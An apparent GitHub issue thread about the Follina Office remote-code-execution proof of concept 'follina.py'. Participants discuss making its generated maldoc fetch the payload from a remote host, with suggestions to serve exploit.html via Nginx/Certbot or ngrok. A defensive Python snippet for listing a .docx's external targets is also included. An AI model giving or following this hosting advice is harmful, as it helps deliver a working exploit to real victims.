chvancooten / follina.py

POC to replicate the full 'Follina' Office RCE vulnerability for testing purposes

-u doesn't seem to do anything #4

Closed aidenmitchell closed 2 years ago

aidenmitchell commented 2 years ago

Hi there, I'm hoping to use this script to generate a Word document that gets the payload from a remote URL.

As mentioned in the docs, you can use -u to specify a URL, but it doesn't seem to do anything; the generated document still tries to reach out to localhost.

aidenmitchell commented 2 years ago

Example command:

python3 follina.py -u https://follina.pages.dev/payload

Generated 'clickme.docx' in current directory
Serving payload on http://localhost/exploit.html

chvancooten commented 2 years ago

Hey! That was a quick report :) The -u option is fairly simple currently in that it only accepts a hostname or IP address. E.g., specifying -u follina.pages.dev would have the maldoc retrieve the payload at http://follina.pages.dev:80/exploit.html. This behavior is fairly simple, but I didn't go through the effort of making everything dynamic or supporting HTTPS yet, for that matter. 🙃 PRs are of course very welcome.
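
To check which host a generated or received .docx will actually contact (the symptom reported in this issue), its external relationship targets can be listed. This is an added example, not part of the thread or of follina.py; it assumes the remote reference is stored as a TargetMode="External" relationship in the package's .rels parts, and the function names and the in-memory sample are constructed for illustration.

```python
import io
import sys
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlsplit

REL = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
MAX_PART = 1 << 20  # refuse oversized .rels parts (zip-bomb guard)

def external_targets(docx):
    """Return (part, relationship type, target) for each external relationship."""
    found = []
    with zipfile.ZipFile(docx) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".rels"):
                continue
            if info.file_size > MAX_PART:
                raise ValueError(f"{info.filename}: part too large")
            data = zf.read(info)
            if b"<!DOCTYPE" in data:  # OOXML parts need no DTD; reject entity tricks
                raise ValueError(f"{info.filename}: unexpected DTD")
            for rel in ET.fromstring(data).iter(REL):
                if rel.get("TargetMode") == "External":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((info.filename, kind, rel.get("Target", "")))
    return found

def remote_hosts(docx):
    """Sorted, de-duplicated http(s) hosts the document references."""
    hosts = set()
    for _, _, target in external_targets(docx):
        parts = urlsplit(target)
        if parts.scheme in ("http", "https") and parts.hostname:
            hosts.add(parts.hostname)
    return sorted(hosts)

def build_sample():
    """Constructed sample: a zip holding one .rels part, not a real document."""
    base = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId1" Type="{base}styles" Target="styles.xml"/>'
            f'<Relationship Id="rId2" Type="{base}oleObject" TargetMode="External"'
            ' Target="http://localhost:80/exploit.html"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels", rels)
    buf.seek(0)
    return buf

if __name__ == "__main__":
    print(remote_hosts(sys.argv[1] if len(sys.argv) > 1 else build_sample()))
```

Run against a file path, it prints the hosts to compare with the value passed to -u; any http(s) host in an unexpected document is worth a closer look during triage.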

aidenmitchell commented 2 years ago

Fair enough, sounds good. I'll see if I can get working on a PR. Thanks for the quick reply! If it's ok with you, I'll keep this issue open, and close it with the PR (link them together sort of deal.)

chvancooten commented 2 years ago

Works for me! An alternative (if you don't want to get into the dev work) would be to simply take the generated www/exploit.html file and host it using something like Nginx with Certbot for SSL.

Karewen commented 2 years ago

Will it work if I host the www/exploit.html using ngrok?